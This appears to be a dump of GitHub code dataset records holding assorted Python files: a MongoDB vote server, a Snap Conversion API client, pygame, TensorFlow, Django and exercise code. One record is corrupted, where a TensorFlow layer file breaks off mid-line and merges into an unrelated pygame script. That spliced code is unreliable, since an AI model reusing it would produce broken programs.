generate_and_save_images(generator,\n epochs,\n seed)\n\n#Train model\ntrain(train_dataset, EPOCHS)\n\n#Generate Gif\n# Display a single image using the epoch number\ndef display_image(epoch_no):\n return PIL.Image.open('image_at_epoch_{:04d}.png'.format(epoch_no))\n\ndisplay_image(EPOCHS)","repo_name":"Bearwithchris/ResearchCode","sub_path":"Reference_GAN/GAN_demo/GAN_keras_mnist/GAN_Keras_attempt.PY","file_name":"GAN_Keras_attempt.PY","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5579028697","text":"#!/usr/bin/env python3\nimport datetime\nimport json\nimport logging\nimport os\nimport sys\nimport urllib.parse\nfrom typing import Callable, Dict, Optional, Union\n\nimport pymongo\nimport werkzeug.serving\nfrom werkzeug.wrappers import Request, Response\nfrom werkzeug.exceptions import HTTPException, BadRequest, MethodNotAllowed\n\nfrom .utils import anonymize_ip\n\nlogger = logging.getLogger(__name__)\n\nFieldValueType = Union[bool, str, int, float]\nEMPTY_BMP = b'BM\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x0c\\x00' \\\n b'\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x18\\x00\\x00\\x00\\xff\\x00'\n\n\nclass Vote:\n MAX_KEY_LEN = 25\n MAX_PAGE_LEN = 255\n MAX_REASON_LEN = 1024\n\n def __init__(self,\n page: str,\n useful: bool,\n fields: Dict[str, FieldValueType],\n ip: Optional[str],\n vote_id: Optional[str]) -> None:\n self.page = page\n self.useful = useful\n self.fields = fields\n\n self.ip = None\n if ip is not None:\n try:\n self.ip = anonymize_ip(ip)\n except ValueError:\n pass\n\n self.vote_id = None\n if vote_id is not None:\n try:\n self.vote_id = vote_id\n except ValueError:\n pass\n\n @classmethod\n def parse(cls, request: Request) -> 'Vote':\n ip = request.access_route[0] if len(request.access_route) > 0 else None\n\n try:\n parameters = cls.parse_qs(request.query_string)\n\n page = parameters['p']\n useful = parameters['v']\n vote_id = parameters['vId']\n\n if not isinstance(page, str):\n raise TypeError('Invalid page type')\n\n if not isinstance(useful, bool):\n raise TypeError('Invalid useful type')\n\n if not isinstance(vote_id, str):\n raise TypeError('Invalid voteId type')\n\n del parameters['p']\n del parameters['v']\n del parameters['vId']\n\n return cls(page[:cls.MAX_PAGE_LEN], useful, parameters, ip, vote_id)\n except (KeyError, ValueError, TypeError) as err:\n logger.exception('Invalid vote request')\n raise ValueError('Invalid vote request') from err\n\n @classmethod\n 
def parse_qs(cls, query_string: bytes) -> Dict[str, FieldValueType]:\n parameters = urllib.parse.parse_qs(str(query_string, 'utf-8'))\n parsed = {} # type: Dict[str, FieldValueType]\n for key, value in parameters.items():\n if len(key) > cls.MAX_KEY_LEN:\n raise ValueError('Key too long')\n\n value = json.loads(value[0][:cls.MAX_REASON_LEN])\n if not (isinstance(value, (str, bool, int, float))):\n raise TypeError('Invalid value type')\n\n parsed[key] = value\n\n return parsed\n\n\nclass Connection:\n \"\"\"A database backend connection\"\"\"\n def __init__(self, connection_uri: str, votesSizeBytes: int) -> None:\n self.conn = pymongo.mongo_client.MongoClient(connection_uri, ssl=True)\n self.db = self.conn['deluge']\n\n try:\n self.db.create_collection('votes', capped=True, size=votesSizeBytes)\n except pymongo.errors.CollectionInvalid:\n pass\n\n self.votes = self.db['votes']\n self.votes.create_index('page')\n self.votes.create_index('voteId')\n\n try:\n self.db.create_collection('votesInitial', capped=True, size=votesSizeBytes)\n except pymongo.errors.CollectionInvalid:\n pass\n\n self.votes_initial = self.db['votesInitial']\n self.votes_initial.create_index('page')\n self.votes_initial.create_index('voteId')\n\n def vote(self, vote: Vote) -> None:\n \"\"\"Record a vote for the given page path.\"\"\"\n doc = {'page': vote.page,\n 'useful': vote.useful,\n 'ip': vote.ip,\n 'date': datetime.datetime.utcnow(),\n 'voteId': vote.vote_id}\n for key, value in vote.fields.items():\n doc['q-{}'.format(key)] = value\n self.votes.save(doc)\n\n def vote_initial(self, vote: Vote) -> None:\n \"\"\"Record an initial vote of yes or no for the given page path.\"\"\"\n doc = {'page': vote.page,\n 'useful': vote.useful,\n 'ip': vote.ip,\n 'date': datetime.datetime.utcnow(),\n 'voteId': vote.vote_id}\n self.votes_initial.save(doc)\n\n\nclass Deluge:\n \"\"\"An HTTP frontend to Deluge.\"\"\"\n def __init__(self, host: str) -> None:\n self.connection = Connection(host, 5*1024*1024*1024)\n\n @Request.application\n def application(self, request: Request) -> Union[Response, HTTPException]:\n \"\"\"The Werkzeug WSGI request handler.\"\"\"\n if request.method != 'GET':\n return MethodNotAllowed(valid_methods=('GET',))\n\n if request.path == '/health':\n return Response('')\n\n if request.path == '/initial_vote':\n try:\n vote = Vote.parse(request)\n except ValueError:\n return BadRequest()\n\n self.connection.vote_initial(vote)\n return Response(EMPTY_BMP, content_type='image/bmp')\n\n try:\n vote = Vote.parse(request)\n except ValueError:\n return BadRequest()\n\n self.connection.vote(vote)\n return Response(EMPTY_BMP, content_type='image/bmp')\n\n @classmethod\n def run(cls) -> Callable[[Request], Union[Response, HTTPException]]:\n \"\"\"Create a Deluge instance and return the associated WSGI application\n using environment variables for configuration. 
Intended as an\n application entry point.\"\"\"\n logging.basicConfig(level=logging.INFO)\n try:\n mongodb_host = os.environ['CONNECTION_STRING']\n except KeyError:\n logger.critical('Must specify CONNECTION_STRING in environment')\n sys.exit(1)\n\n logger.info('Connecting to %s', mongodb_host)\n return cls(mongodb_host).application\n\n\napplication = Deluge.run()\n\n\ndef main() -> None:\n werkzeug.serving.run_simple('localhost', 4000, application)\n","repo_name":"mongodb/deluge","sub_path":"deluge/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"22884247770","text":"\"\"\"\nFastlane bot configuration object -- selector constants\n\"\"\"\n\nNETWORK_ETHEREUM = \"ethereum\"\nNETWORK_MAINNET = NETWORK_ETHEREUM\nNETWORK_TENDERLY = \"tenderly\"\nNETWORK_BASE = \"coinbase_base\"\nNETWORK_ARBITRUM = \"arbitrum_one\"\nNETWORK_OPTIMISM = \"optimism\"\nNETWORK_CANTO = \"canto\"\nNETWORK_FANTOM = \"fantom\"\nNETWORK_MANTLE = \"mantle\"\nNETWORK_SCROLL = \"scroll\"\nNETWORK_BSC = \"binance_smart_chain\"\nNETWORK_POLYGON = \"polygon\"\nNETWORK_POLYGON_ZKEVM = \"polygon_zkevm\"\n\nDATABASE_SQLITE = \"sqlite\"\nDATABASE_POSTGRES = \"postgres\"\nDATABASE_MEMORY = \"memory\"\nDATABASE_SDK = \"sdk\"\nDATABASE_UNITTEST = \"unittest\"\n\nLOGGER_DEFAULT = \"default\"\n\nLOGLEVEL_DEBUG = \"debug\"\nLOGLEVEL_INFO = \"info\"\nLOGLEVEL_WARNING = \"warning\"\nLOGLEVEL_ERROR = \"error\"\nLOGLEVEL_BANCOR_V2 = \"bancor_v2\"\n\nPROVIDER_DEFAULT = \"default\" # the default provider for network\nPROVIDER_INFURA = \"infura\"\nPROVIDER_ALCHEMY = \"alchemy\"\nPROVIDER_TENDERLY = \"tenderly\"\nPROVIDER_UNITTEST = \"unittest\"\n\n# Constants\nFACTORY_ADDRESS = \"FACTORY_ADDRESS\"\nROUTER_ADDRESS = \"ROUTER_ADDRESS\"\nCARBON_CONTROLLER_ADDRESS = \"CARBON_CONTROLLER_ADDRESS\"\nCARBON_CONTROLLER = \"CARBON_CONTROLLER\"\nBALANCER_VAULT_ADDRESS = \"BALANCER_VAULT_ADDRESS\"\nUNISWAP_V2 = \"uniswap_v2\"\nUNISWAP_V3 = \"uniswap_v3\"\nSOLIDLY = \"solidly_v2\"\nCARBON_V1 = \"carbon_v1\"","repo_name":"bancorprotocol/fastlane-bot","sub_path":"fastlane_bot/config/selectors.py","file_name":"selectors.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"37"} +{"seq_id":"33432630912","text":"\"\"\"\nGallery\n-------\n\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom IPython.display import display\nfrom ipywidgets import (\n Button,\n HBox,\n Layout,\n Output\n)\nfrom typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n from datatype.interactive import Interactive\n\n\nclass Gallery:\n def __init__(self, collection: list[Interactive]):\n self.collection = collection\n\n self.index = 0\n self.length = len(self.collection)\n self.output = Output()\n self.next = Button(description='Next')\n self.previous = Button(description='Previous')\n\n def create(self) -> Output:\n \"\"\"Create the gallery display.\n\n Returns:\n An Output object representing the gallery display.\n\n \"\"\"\n\n with self.output:\n self.output.clear_output(wait=True)\n\n widget = self.collection[self.index]\n plot = widget.create()\n\n button = HBox(\n [self.previous, self.next],\n layout=Layout(\n align_items='center',\n display='flex',\n flex_flow='row',\n align_content='stretch',\n justify_content='center'\n )\n )\n\n button.add_class('button')\n\n self.set_event_listener()\n\n display(plot)\n display(button)\n\n return self.output\n\n 
def on_next(self, _: Button) -> None:\n \"\"\"Event handler for the 'Next' button click.\n\n Args:\n _: The 'Next' button widget (unused).\n\n \"\"\"\n\n if self.index == self.length - 1:\n self.index = 0\n else:\n self.index = self.index + 1\n\n self.create()\n\n def on_previous(self, _: Button) -> None:\n \"\"\"Event handler for the 'Previous' button click.\n\n Args:\n _: The 'Previous' button widget (unused).\n\n \"\"\"\n\n if self.index == 0:\n self.index = self.length - 1\n else:\n self.index = self.index - 1\n\n self.create()\n\n def set_event_listener(self) -> None:\n \"\"\"Set event listeners for the 'Next' and 'Previous' buttons.\"\"\"\n\n self.next.on_click(self.on_next)\n self.previous.on_click(self.on_previous)\n","repo_name":"braycarlson/warbler.py","sub_path":"warbler.py/datatype/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"39388436109","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 26 21:44:30 2017\n\n@author: saul\n\nFunction to count the words in a text.\n\nPass the vector that stores the text as a parameter.\nNote: The text must not contain accented letters.\n\n\"\"\"\ndef contarPalabras(vector):\n l = 0 # length of the vector\n j = 0 # pointer\n nPal = 0 # number of words\n iniCad = False # when a word starts\n finCad = False # when the word ends\n tamVec = len(vector)\n \n while(l < len(vector)):\n # iterate over the vector of letters\n for i in range(j, tamVec):\n # uppercase letters\n if ord(vector[i]) >= 65 and ord(vector[i]) <= 90:\n iniCad = True\n # lowercase letters\n elif ord(vector[i]) >= 97 and ord(vector[i]) <= 122:\n iniCad = True\n else:\n if iniCad == True:\n finCad = True\n \n # check whether this is the last word\n if l == tamVec:\n if iniCad == True:\n finCad = True\n \n l = l + 1 # increment\n \n # if a word was found\n if iniCad == True and finCad == True:\n nPal = nPal + 1 # count the word\n # reset the helper variables\n iniCad = False\n finCad = False\n j = i\n break # exit the for loop\n \n return nPal\n","repo_name":"ticsaul/contar_palabras","sub_path":"contar_palabras.py","file_name":"contar_palabras.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24199254430","text":"\"\"\"\nquestion:\nGiven an image represented by an NxN matrix, where each pixel in the image is 4 bytes, write a method to rotate the\nimage by 90 degrees. 
Can you do this in place?\n\nsource:\nMcDowell, Gayle Laakmann., Cracking the Coding Interview: 189 Programming Questions and Solutions 6th Edition (2015) 203.\n\"\"\"\n\ndef rotate_matrix_90(matrix):\n \"\"\" rotate matrix in-place 90 degrees clockwise \"\"\"\n\n matrix_size = len(matrix)\n num_levels = matrix_size // 2\n\n def rotate_level(cur_level):\n \"\"\" rotate a level of matrix in-place 90 deg \"\"\"\n\n nonlocal matrix, matrix_size, num_levels\n\n # first and last matrix indexes of rows and cols in this level\n first = num_levels - cur_level\n last = (matrix_size - 1) - first\n\n # swap values from top, left, bottom and right sides\n # in-place (with help of temp var) to effect rotation\n for i in range(first, last, 1):\n\n # offset of i within this level's ring (first is non-zero for inner levels)\n offset = i - first\n # temp = top\n temp = matrix[first][i]\n # top = left\n matrix[first][i] = matrix[last - offset][first]\n # left = bottom\n matrix[last - offset][first] = matrix[last][last - offset]\n # bottom = right\n matrix[last][last - offset] = matrix[i][last]\n # right = temp\n matrix[i][last] = temp\n\n # rotate each level of matrix\n cur_level = num_levels\n while cur_level > 0:\n\n rotate_level(cur_level)\n cur_level -= 1\n\n\"\"\"\ntest\n\"\"\"\nif __name__ == '__main__':\n\n m = [[1,2],[3,4]]\n m1 = [[1,2,3],[4,5,6],[7,8,9]]\n m2 = [[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]\n\n rotate_matrix_90(m)\n rotate_matrix_90(m1)\n rotate_matrix_90(m2)\n\n assert m == [[3,1],[4,2]]\n assert m1 == [[7, 4, 1], [8, 5, 2], [9, 6, 3]]\n assert m2 == [[13, 9, 5, 1], [14, 10, 6, 2], [15, 11, 7, 3], [16, 12, 8, 4]]","repo_name":"parkerjgit/algorithms","sub_path":"python/arrays_and_strings/rotate_matrix.py","file_name":"rotate_matrix.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6262815935","text":"from django.contrib import admin\n\nfrom oscar.core.loading import get_model\n\nOrderAndItemCharges = get_model(\"shipping\", \"OrderAndItemCharges\")\nWeightBand = get_model(\"shipping\", \"WeightBand\")\nWeightBased = get_model(\"shipping\", \"WeightBased\")\n\n\nclass OrderChargesAdmin(admin.ModelAdmin):\n filter_horizontal = (\"countries\",)\n list_display = (\n \"name\",\n \"description\",\n \"price_per_order\",\n \"price_per_item\",\n \"free_shipping_threshold\",\n )\n\n\nclass WeightBandInline(admin.TabularInline):\n model = WeightBand\n\n\nclass WeightBasedAdmin(admin.ModelAdmin):\n filter_horizontal = (\"countries\",)\n inlines = [WeightBandInline]\n\n\nadmin.site.register(OrderAndItemCharges, OrderChargesAdmin)\nadmin.site.register(WeightBased, WeightBasedAdmin)\n","repo_name":"django-oscar/django-oscar","sub_path":"src/oscar/apps/shipping/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":5941,"dataset":"github-code","pt":"37"}
+{"seq_id":"33650494105","text":"import tensorflow as tf\nfrom SLAM import SLAM\nimport numpy as np\n\nclass SLAM_Layer(tf.keras.layers.Layer):\n def __init__(self, dense, tensorLen, relu=False):\n super(SLAM_Layer, self).__init__()\n # self.SLAM = SLAM(dense, relu=relu)\n self.dense = dense\n self.relu = relu\n self.tensorLen = tensorLen\n def build(self, input_shape):\n # print(\"OVERALL\", input_shape)\n # print(\"BUILD SHAPE\", input_shape[3])\n self.SLAM = SLAM(self.dense, matrixSize=input_shape[3], relu=self.relu)\n\n def call(self, x_main, x_aux):\n # watch out for batch norm - weird w training=True\n # print(x_main)\n # print(\"MAIN SHAPE\" , 
x_main.shape[3])\n\n aux_slices = tf.unstack(x_aux, axis=1) #axis=1 because 0th dimension is unknown\n main_slices = tf.unstack(x_main, axis=1) #axis=1 because 0th dimension is unknown\n\n # print(\"AUX SHAPE\" , aux_slices)\n # print(\"MAIN SHAPE\" , main_slices)\n\n # c = lambda i : i self.tic:\n #print(\"updating\")\n #print(self.power)\n if self.light > 0:\n if (millis() - self.start) > self.tic*10000:\n self.light = 0\n else:\n self.light = self.light - .001\n else:\n self.power = self.power + 1\n if self.power > self.tic*12000:\n self.power = 0\n self.light = 1\n #print(self.name, millis() - self.start)\n self.start = millis()\n self.timer = millis()\n self.check_near(hexes)\n return\n\n def draw(self):\n #draw the base\n pygame.draw.polygon(windowSurface, self.color, self.all_verts)\n #draw the button to reset\n pygame.draw.polygon(windowSurface, self.button_color, self.button_verts)\n #draw the LEDS\n led_color = (0,int(255*self.light),0)\n for led in self.led_points:\n pygame.draw.circle(windowSurface, led_color, led, size//5, 0)\n return\n\n def handle_click(self, pos):\n if self.is_inside(pos, self.button_verts):\n self.power = 0\n self.light = 1\n self.timer = millis()\n self.start = millis()\n return\n\n def move_to(self, pos):\n self.pos = pos\n self.update_verts()\n\n def is_inside(self, pos, poly = None):\n if poly is None:\n poly = self.all_verts\n x = pos[0]\n y = pos[1]\n n = len(poly)\n inside = False\n\n p1x,p1y = poly[0]\n for i in range(n+1):\n p2x,p2y = poly[i % n]\n if y > min(p1y,p2y):\n if y <= max(p1y,p2y):\n if x <= max(p1x,p2x):\n if p1y != p2y:\n xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x\n if p1x == p2x or x <= xints:\n inside = not inside\n p1x,p1y = p2x,p2y\n\n return inside\n\n def check_near(self, hexes):\n radius = int(size*2)\n near = False\n for hex in hexes:\n if self.distance_between_points(self.pos, hex.pos) < radius and (self.name != hex.name):\n if hex.light > 0:\n self.power = self.power * (1+gain*hex.light)\n #print(self.name, \"gaining\")\n near = True\n if near:\n self.button_color = PINK\n else:\n self.button_color = WHITE\n\n def distance_between_points(self, pos1, pos2):\n x1 = pos1[0]\n y1 = pos1[1]\n x2 = pos2[0]\n y2 = pos2[1]\n return sqrt((x1-x2)**2 + (y1-y2)**2)\n\n\n\ndef millis():\n return time.time()*1000\n\n\n# set up pygame\npygame.init()\n\n# set up the window\nwindowSurface = pygame.display.set_mode((width, height), 0, 32)\npygame.display.set_caption('blinky-blinky')\n\n# draw the background onto the surface\nwindowSurface.fill(BLACK)\nheight_scalar = height//7\nwidth_scalar = width//7\nhex0 = Hex((2*width_scalar,1*height_scalar),0)\nhex1 = Hex((4*width_scalar,1*height_scalar),1)\nhex2 = Hex((2*width_scalar,3*height_scalar),2)\nhex3 = Hex((4*width_scalar,3*height_scalar),3)\nhex4 = Hex((2*width_scalar,5*height_scalar),4)\nhex5 = Hex((4*width_scalar,5*height_scalar),5)\n\nhexes = []\nhexes.append(hex0)\nhexes.append(hex1)\nhexes.append(hex2)\nhexes.append(hex3)\nhexes.append(hex4)\nhexes.append(hex5)\nmoving = -1\n\n# draw the window onto the screen\npygame.display.update()\n\n# run the game loop\nwhile True:\n windowSurface.fill(BLACK)\n for hex in hexes:\n hex.update(hexes)\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == SPACE:\n for i in range(len(hexes)):\n hexes[i].power = random.randint(0,int(hexes[i].tic*12000))\n if event.type == MOUSE_DOWN:\n pressed = True\n moving = -1\n for i in range(len(hexes)):\n inside = hexes[i].is_inside(event.pos)\n if inside:\n hexes[i].handle_click(event.pos)\n 
moving = i\n\n if event.type == MOUSE_UP:\n pressed = False\n moving = -1\n\n if event.type == MOUSE_MOVE and pressed:\n hexes[moving].move_to(event.pos)\n\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n for hex in hexes:\n hex.draw()\n pygame.display.update()\n\n# draw a circle onto the surface\n#pygame.draw.circle(windowSurface, BLUE, (300, 50), 20, 0)\n","repo_name":"hgmason/firefly","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28477734301","text":"def the_number_one(n):\n if n == 0:\n return True\n if n<=2:\n return False\n totalEven = 0\n totalOdd = 0\n for i in range(1, n+1):\n uocSo = n % i\n if uocSo == 0:\n print(i)\n if i % 2 == 0:\n totalEven += 1\n else:\n totalOdd += 1\n return totalEven == totalOdd\nprint(the_number_one(2))\n","repo_name":"luandnh/CodeLearnTraining.Python","sub_path":"the_number_one.py","file_name":"the_number_one.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10574571050","text":"#lists\nlucky_numbers = [4,8,15] #create list named lucky_numbers\nfriends = [\"john\", \"jake\", \"jim\"]\nfriends.extend(lucky_numbers) \nfriends.append(\"creed\")\nfriends.insert(1, \"kelley\")\n#friends.clear()\nfriends.pop()\n#friends.sort()\nprint(friends.index(\"john\"))\nfriends2 = friends.copy()\nprint(friends + friends2)\n","repo_name":"omarakamal/Teaching-Python","sub_path":"Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32599656210","text":"\"\"\"\nConversion API Client\n\"\"\"\nimport multiprocessing\nimport logging\nfrom snap_business_sdk.api.default_api import DefaultApi\nfrom snap_business_sdk.api_client import ApiClient, Configuration\nfrom snap_business_sdk.capi_utils import (\n is_empty_string,\n ErrorCallback\n)\n\nSDK_LANGAUGE = \"python\"\nSDK_VERSION = \"1.0.0\"\nAPI_VERSION = \"v2\"\n\n# headers\nHEADER_SDK_VERSION = \"X-CAPI-BusinessSDK\"\nHEADER_CAPI_PATH = \"X-CAPI-Path\"\n\n# user agent\nUSER_AGENT = \"BusinessSDK/Python/{sdk_version}\".format(sdk_version=SDK_VERSION)\nUSER_AGENT_WITH_PAD = \"{user_agent} (LaunchPAD)\".format(user_agent=USER_AGENT)\n\n# capi url\nPROD_URL = \"https://tr.snapchat.com/{api_version}\".format(api_version=API_VERSION)\nSTAGING_URL = \"https://tr-shadow.snapchat.com/{api_version}\".format(api_version=API_VERSION)\n\n# Add task to the set. 
This creates a strong reference.\nbackground_tasks = set()\n\n\nclass ConversionApi(object):\n logger = None\n\n def __init__(self, access_token=None, launchpad_url=None):\n self.configuration = Configuration(\n access_token=access_token,\n host=launchpad_url\n )\n\n self.api_client = ApiClient(self.configuration)\n # Set header\n # User-Agent: BusinessSDK/Python/{sdk-version}\n self.api_client.user_agent = USER_AGENT\n # X-CAPI-BusinessSDK: python/{sdk-version}\n self.api_client.set_default_header(\n HEADER_SDK_VERSION,\n '{sdk_language}/{sdk_version}'.format(sdk_language=SDK_LANGAUGE, sdk_version=SDK_VERSION))\n\n # Create default api instance\n self.default_api = DefaultApi(self.api_client)\n\n @classmethod\n def set_debug_mode(cls, enabled=False):\n # disable logging\n if not enabled:\n cls.logger = None\n return\n\n # set default basic logger\n logging.basicConfig(format='%(asctime)s %(levelname)s \\n%(message)s', datefmt='%H:%M:%S')\n cls.logger = logging.getLogger(__name__)\n cls.logger.setLevel(logging.INFO)\n\n @classmethod\n def log(cls, info):\n if cls.logger is not None:\n cls.logger.info(info)\n\n @classmethod\n def warn(cls, info):\n if cls.logger is not None:\n cls.logger.warn(info)\n\n @classmethod\n def error(cls, info):\n if cls.logger is not None:\n cls.logger.error(info)\n\n @classmethod\n def validate_and_create_events(cls, raw_events):\n # validate and convert raw events to capi events\n capi_events = list(map(lambda event: (None if event is None else event.getCapiEvent()), raw_events))\n # filter all events that are invalid (None)\n capi_events = list(filter(lambda event: event is not None, capi_events))\n return capi_events\n\n def logEvents(self, capi_events):\n ConversionApi.log(\n 'Host: {host} '\n '\\nAccess_token: {access_token} '\n '\\nHeaders: {headers} '\n '\\nConversion events: {events}'.format(\n host=self.default_api.api_client.configuration.host,\n access_token=self.default_api.api_client.configuration.access_token,\n headers=self.default_api.api_client.default_headers,\n events=capi_events\n )\n )\n\n def send_test_event(self, raw_event):\n return self.send_test_events([raw_event])\n\n def send_test_events(self, raw_events):\n if raw_events is None:\n resp = ErrorCallback('Conversion event cannot be empty')\n ConversionApi.error('Send Test Exception: {message}'.format(message=resp.get()))\n return resp\n\n # validate event attributes\n capi_events = self.validate_and_create_events(raw_events)\n\n # log events\n self.logEvents(capi_events)\n\n try:\n resp = self.default_api.send_test_data(body=capi_events)\n ConversionApi.log('Send Test Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Send Test Exception: {message}'.format(message=e.__str__()))\n\n return resp\n\n def get_test_event_logs(self, asset_id):\n try:\n resp = self.default_api.conversion_validate_logs(asset_id=asset_id)\n ConversionApi.log('Get Test Logs Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Get Test Logs Exception: {message}'.format(message=e.__str__()))\n return resp\n\n def get_test_event_stats(self, asset_id):\n try:\n resp = self.default_api.conversion_validate_stats(asset_id=asset_id)\n ConversionApi.log('Get Test Stats Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Get Test Stats Exception: {message}'.format(message=e.__str__()))\n return resp\n\n # send single event 
in synchronous mode\n def send_event_sync(self, raw_event):\n return self.send_events_sync([raw_event])\n\n # send multiple events in synchronous mode\n def send_events_sync(self, raw_events):\n return self.send_events(raw_events, async_req=False)\n\n # send single event in asynchronous mode\n def send_event(self, raw_event):\n return self.send_events([raw_event])\n\n # send multiple events in asynchronous mode\n def send_events(self, raw_events, async_req=True):\n if raw_events is None:\n resp = ErrorCallback('Conversion event cannot be empty')\n ConversionApi.error('Exception: {message}'.format(message=resp.get()))\n return resp\n\n # validate event attributes\n capi_events = self.validate_and_create_events(raw_events)\n\n # log events\n self.logEvents(capi_events)\n\n try:\n resp = self.default_api.send_data(body=capi_events, async_req=async_req)\n ConversionApi.log('Result: {resp}'.format(resp=resp))\n except Exception as e:\n resp = ErrorCallback(e.__str__())\n ConversionApi.error('Exception: {message}'.format(message=e.__str__()))\n return resp\n\n","repo_name":"Snapchat/business-sdk-python","sub_path":"snap_business_sdk/public/conversion_api.py","file_name":"conversion_api.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"12949647368","text":"\nfrom jinja2 import Environment, PackageLoader, select_autoescape\n\nenv = Environment(\n loader=PackageLoader('jinja2Demo', 'templates'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n\ntemplate1 = env.get_template('mytemplate.html')\nusers1=[{'name':'John'},{'name':'Tom', 'hidden':True},{'name':'Lisa'},{'name':'Bob'}]\nusers2=['li', 'zhang', 'zhong', 'zhou']\nhtml1 = template1.render(a_variable='a_variable', name='apktool', users=users1,\n users2 = users2)\n\ntemplate2 = env.get_template('child.html')\nhtml2 = template2.render()\n\nprint(html1)\n","repo_name":"apktool/LearnPython","sub_path":"9.04.01.py","file_name":"9.04.01.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45744906108","text":"from typing import List\n\nclass Node:\n def __init__(self, value, left_child: 'Node' = None, right_child: 'Node' = None):\n self.value = value\n self.left_node = left_child\n self.right_node = right_child\n\n\nclass Solution:\n def find_path_where_sum_is_k(self, node: Node, k: int, result: List = []):\n if not node:\n return False\n temp_result = result.copy()\n temp_result.append(node.value)\n if node.value == k and not node.left_node and not node.right_node:\n print(\"Path: {}\".format(temp_result))\n return True\n if node.value > k: # no need to traverse further\n return False\n return self.find_path_where_sum_is_k(node.left_node, k - node.value, temp_result) or \\\n self.find_path_where_sum_is_k(node.right_node, k - node.value, temp_result)\n\n def find_all_paths_where_sum_is_k(self, node: Node, k: int, result: List = []):\n if not node:\n return\n temp_result = result.copy()\n temp_result.append(node.value)\n if node.value == k and not node.left_node and not node.right_node:\n print(\"Path: {}\".format(temp_result))\n return\n if node.value > k:\n return\n self.find_all_paths_where_sum_is_k(node.left_node, k - node.value, temp_result)\n self.find_all_paths_where_sum_is_k(node.right_node, k - node.value, temp_result)\n\n\nsample_tree = Node(1, Node(2, Node(4), Node(5)), Node(3, Node(4), Node(6)))\ntarget_sum = 8\nsol = 
Solution()\nprint(\"Finding the first path whose sum is equal to {}\".format(target_sum))\nprint(sol.find_path_where_sum_is_k(sample_tree, target_sum))\n\nprint(\"Finding all paths whose sum is equal to {}\".format(target_sum))\nsol.find_all_paths_where_sum_is_k(sample_tree, target_sum)\n","repo_name":"arvindrocky/dataStructures","sub_path":"trees/find_path_where_sum_is_k.py","file_name":"find_path_where_sum_is_k.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18878837839","text":"from django.urls import path\r\nfrom .views import TaskDetailView, TaskListView, TaskCreateView, TaskUpdateView, TaskDeleteView, TaskIndexView, TaskMainView\r\n\r\nurlpatterns = [\r\n    path('', TaskIndexView.as_view(), name=\"index\"),\r\n    path('task_list/', TaskListView.as_view(), name=\"list\"),\r\n    path('task_list/main', TaskMainView.as_view(), name=\"main\"),\r\n    # pk captures the int value received in the URL so the template can use it\r\n    path('task_list/<int:pk>', TaskDetailView.as_view(), name=\"detail\"),\r\n    path('task_list/create/', TaskCreateView.as_view(), name=\"create\"),\r\n    path('task_list/<int:pk>/update', TaskUpdateView.as_view(), name=\"update\"),\r\n    path('task_list/<int:pk>/delete', TaskDeleteView.as_view(), name=\"delete\"),\r\n]\r\n","repo_name":"Kanata0204/task_app","sub_path":"taskapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22837592406","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\nfrom typing import List\n\n\ndef scatter_3d(axes: List[str], data: pd.DataFrame, show=True):\n    \"\"\"Plot 3D data.\n\n    :param axes:\n        List of axes labels in the input DataFrame (i.e. column names). 
